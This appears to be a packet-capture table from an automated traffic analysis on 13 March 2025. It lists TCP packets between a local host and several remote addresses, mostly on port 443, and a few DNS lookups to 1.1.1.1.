                                                                                            Mar 13, 2025 14:50:28.389594078 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389620066 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389622927 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389636993 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389657974 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389673948 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389704943 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389720917 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389746904 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389760017 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389771938 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389772892 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389791965 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389813900 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389858961 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389878988 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389878988 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389895916 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389939070 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.389961958 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.389993906 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.390024900 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.390960932 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.391122103 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.391238928 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.391320944 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.391467094 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.391577959 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.391643047 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.392138004 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.392254114 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.392349005 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.392473936 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.392571926 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.392666101 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.392790079 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.392884970 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.393004894 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.393347979 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.393455029 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.393537045 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.393589020 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.393703938 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.393809080 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.393852949 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.394381046 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.394504070 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.394563913 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.395054102 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.395184040 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.395446062 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.395587921 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.395701885 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.395823002 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.395967960 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.396083117 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.396209955 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.396636963 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.396770000 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.396866083 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.396894932 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.396977901 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.397006035 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.397366047 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.397367954 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.397417068 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.397460938 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.397501945 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.397542000 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.397566080 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.397663116 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.397802114 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.397910118 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.398030996 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.398186922 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.398293018 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.398411036 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.398737907 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.398854971 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.398977041 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.399230957 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.399357080 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.399470091 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.399873972 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.399988890 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.400026083 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.400358915 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.400466919 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.400506020 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.400798082 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.400897980 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.400948048 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.400962114 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401068926 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401098013 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401201963 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401226997 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401326895 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401350975 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401453972 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401472092 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401510954 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401585102 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401617050 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401638031 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401655912 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401712894 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401742935 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401753902 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401784897 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401812077 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.401904106 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401931047 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.401948929 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402050018 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402065992 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402098894 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402184010 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402210951 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402223110 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402239084 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402247906 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402247906 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402251005 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402261972 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402266979 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402292967 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402293921 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402314901 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402332067 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402354956 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402373075 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402399063 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402429104 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402439117 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402453899 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402463913 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402470112 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402477026 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402499914 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402523994 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402576923 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402590036 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402626991 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402641058 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402648926 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402664900 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402673960 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402688980 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402705908 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402719975 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402757883 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402782917 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402789116 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402801991 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.402815104 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402828932 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402865887 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:28.402875900 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.403088093 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:28.403539896 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:29.507181883 CET4434977078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:29.507280111 CET49770443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:29.507751942 CET49770443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:29.507761002 CET4434977078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:29.509520054 CET49770443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:29.509526014 CET4434977078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:30.851278067 CET4434977078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:30.851305008 CET4434977078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:30.851365089 CET4434977078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:30.851363897 CET49770443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:30.851399899 CET49770443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:30.851438999 CET49770443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:30.851708889 CET49770443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:30.851736069 CET4434977078.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:30.854763031 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:30.854824066 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:30.854912043 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:30.855173111 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:30.855182886 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:33.803658009 CET4971380192.168.2.4142.250.74.195
                                                                                            Mar 13, 2025 14:50:33.803730965 CET4971580192.168.2.42.16.100.168
                                                                                            Mar 13, 2025 14:50:33.803826094 CET4971780192.168.2.42.16.100.168
                                                                                            Mar 13, 2025 14:50:33.808659077 CET8049713142.250.74.195192.168.2.4
                                                                                            Mar 13, 2025 14:50:33.808892012 CET4971380192.168.2.4142.250.74.195
                                                                                            Mar 13, 2025 14:50:33.809231043 CET80497152.16.100.168192.168.2.4
                                                                                            Mar 13, 2025 14:50:33.809281111 CET80497172.16.100.168192.168.2.4
                                                                                            Mar 13, 2025 14:50:33.809297085 CET4971580192.168.2.42.16.100.168
                                                                                            Mar 13, 2025 14:50:33.809329987 CET4971780192.168.2.42.16.100.168
                                                                                            Mar 13, 2025 14:50:34.935858011 CET49714443192.168.2.42.19.96.32
                                                                                            Mar 13, 2025 14:50:34.936321020 CET4971680192.168.2.42.16.100.168
                                                                                            Mar 13, 2025 14:50:34.936403990 CET4971880192.168.2.42.23.77.188
                                                                                            Mar 13, 2025 14:50:36.721693993 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:36.721786022 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:36.721875906 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:36.721956015 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:36.723058939 CET49769443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:36.723083973 CET4434976978.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:36.853529930 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:36.853590965 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:36.853621960 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:36.853662968 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:36.945157051 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:36.945185900 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:37.396512985 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:37.396579027 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:37.397588968 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:37.397608042 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:38.301651955 CET4434977178.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:38.301911116 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:38.350060940 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:38.350119114 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:38.350290060 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:38.350851059 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:38.350862980 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:39.700373888 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:39.700472116 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:39.712188005 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:39.712234020 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:39.712594986 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:39.712665081 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:39.713284969 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:39.756331921 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:40.633764982 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:40.633840084 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:40.633881092 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:40.633955002 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:40.636543036 CET49772443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:40.636564970 CET4434977278.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:41.699337006 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:41.699379921 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:41.699464083 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:41.700062990 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:41.700078011 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.219913006 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.220026016 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.220866919 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.220885992 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.222765923 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.222784042 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.222865105 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.222877979 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.222927094 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.222930908 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.222968102 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.222976923 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.222985983 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.222992897 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.223058939 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.223072052 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.223112106 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.223128080 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.223138094 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.223141909 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.223162889 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.223172903 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.223216057 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.223227024 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.223268986 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.223278999 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:43.223285913 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:43.223293066 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:44.694508076 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:44.694577932 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:44.694591045 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:44.694632053 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:44.695949078 CET49774443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:44.695972919 CET4434977478.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:44.820038080 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:44.820092916 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:44.820152998 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:44.820420980 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:44.820434093 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:46.186422110 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:46.186644077 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:46.187308073 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:46.187323093 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:46.189271927 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:46.189281940 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:47.219163895 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:47.219284058 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:47.219312906 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:47.219361067 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:47.219600916 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:47.219640017 CET4434977578.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:47.219727993 CET49775443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:47.221538067 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:47.221582890 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:47.221673012 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:47.222027063 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:47.222038984 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:48.718987942 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:48.719048977 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:48.722779036 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:48.722803116 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:48.723114014 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:48.723174095 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:48.723628998 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:48.768321991 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:49.651611090 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:49.651901007 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:49.651937008 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:49.652007103 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:49.652626991 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:49.652678013 CET4434977678.47.63.132192.168.2.4
                                                                                            Mar 13, 2025 14:50:49.652776003 CET49776443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:50:50.279191971 CET49771443192.168.2.478.47.63.132
                                                                                            Mar 13, 2025 14:51:19.491226912 CET4971280192.168.2.42.23.77.188
                                                                                            Mar 13, 2025 14:51:19.491277933 CET49710443192.168.2.440.126.31.71
                                                                                            Mar 13, 2025 14:51:19.491300106 CET4971180192.168.2.42.16.100.168
                                                                                            Mar 13, 2025 14:51:19.496277094 CET80497122.23.77.188192.168.2.4
                                                                                            Mar 13, 2025 14:51:19.496373892 CET4971280192.168.2.42.23.77.188
                                                                                            Mar 13, 2025 14:51:19.496655941 CET4434971040.126.31.71192.168.2.4
                                                                                            Mar 13, 2025 14:51:19.496685028 CET80497112.16.100.168192.168.2.4
                                                                                            Mar 13, 2025 14:51:19.496711969 CET49710443192.168.2.440.126.31.71
                                                                                            Mar 13, 2025 14:51:19.496742964 CET4971180192.168.2.42.16.100.168

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 13, 2025 14:49:44.750199080 CET5666853192.168.2.41.1.1.1
                                                                                            Mar 13, 2025 14:49:44.757081985 CET53566681.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:49:47.171947002 CET6287953192.168.2.41.1.1.1
                                                                                            Mar 13, 2025 14:49:47.185832977 CET53628791.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:08.883313894 CET53565081.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:08.883508921 CET53550311.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:08.918514013 CET5823553192.168.2.41.1.1.1
                                                                                            Mar 13, 2025 14:50:08.918663979 CET4919053192.168.2.41.1.1.1
                                                                                            Mar 13, 2025 14:50:08.924556017 CET53655311.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:08.925170898 CET53582351.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:08.925215960 CET53491901.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:11.946039915 CET53497911.1.1.1192.168.2.4
                                                                                            Mar 13, 2025 14:50:12.122852087 CET53512431.1.1.1192.168.2.4
